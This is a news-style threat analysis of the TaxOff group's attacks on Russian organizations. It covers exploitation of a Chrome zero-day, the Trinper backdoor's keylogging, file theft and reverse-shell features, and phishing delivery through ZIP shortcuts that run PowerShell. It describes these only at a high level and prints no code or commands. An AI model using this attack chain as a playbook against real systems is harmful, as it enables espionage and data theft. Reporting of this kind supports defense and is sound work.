Broke in through Chrome, stole documents, and vanished before the antivirus could react — analysis of the Trinper backdoor
He doesn’t break doors — he uses the ones you left open.
In March 2025, experts from Positive Technologies recorded a series of targeted attacks on Russian organizations using a previously unknown vulnerability in Google Chrome. Behind the cyber operation was a group called TaxOff, which exploited CVE-2025-2783 to deploy a powerful backdoor known as Trinper. The vulnerability has already been patched, but the attack demonstrated how dangerous zero-day-based intrusion chains can be.
The initial infection vector was a phishing email disguised as an invitation to the “Primakov Readings” forum. Clicking the link in the email triggered a one-click exploit, after which the Trinper trojan was installed on the victim’s machine. A similar pattern was observed in October 2024, when the malware spread via fake invitations to a Union State security conference.
Trinper, written in C++, leverages multithreading to simultaneously collect system information, log keystrokes, and steal files of specific formats — including .doc, .xls, .ppt, .rtf, and .pdf. The backdoor establishes a connection with a remote command-and-control server (C2) from which it receives instructions: from launching the command line and creating a reverse shell to modifying directories and self-deletion. Thanks to multithreading, Trinper is not only efficient at hiding its presence but also maintains constant data exchange with the server, downloads additional modules, and executes complex scenarios.
Malware delivery relied on tools such as Donut and Cobalt Strike. In one case, the malicious code was distributed via a ZIP archive containing a Windows shortcut, which launched a PowerShell command to download a fake document and trigger the installation of Trinper.
According to Positive Technologies, behavioral analysis of the infection chain revealed similarities to attacks by another hacking group known as Team46. Furthermore, a month before the March incident, there were phishing emails allegedly sent by Rostelecom, claiming technical maintenance — also containing a ZIP file with a shortcut executing PowerShell and installing the backdoor.
Another case, described by Doctor Web in September 2024, involved an attack on a logistics company that exploited a zero-day vulnerability CVE-2024-6473 in Yandex Browser. The malicious code performed DLL hijacking, replacing DLL files to load and execute arbitrary software. The vulnerability was patched only in September 2024 with the release of version 24.7.1.380.
According to analysts, TaxOff has resilient capabilities for conducting complex and targeted attacks. Its use of zero-day exploits and custom backdoors indicates a strategic intent to maintain long-term presence in victims’ infrastructures. The attack vectors, phishing lures, and malware delivery methods demonstrate a high level of sophistication and a focus on specific targets — ranging from government agencies to industrial sectors.
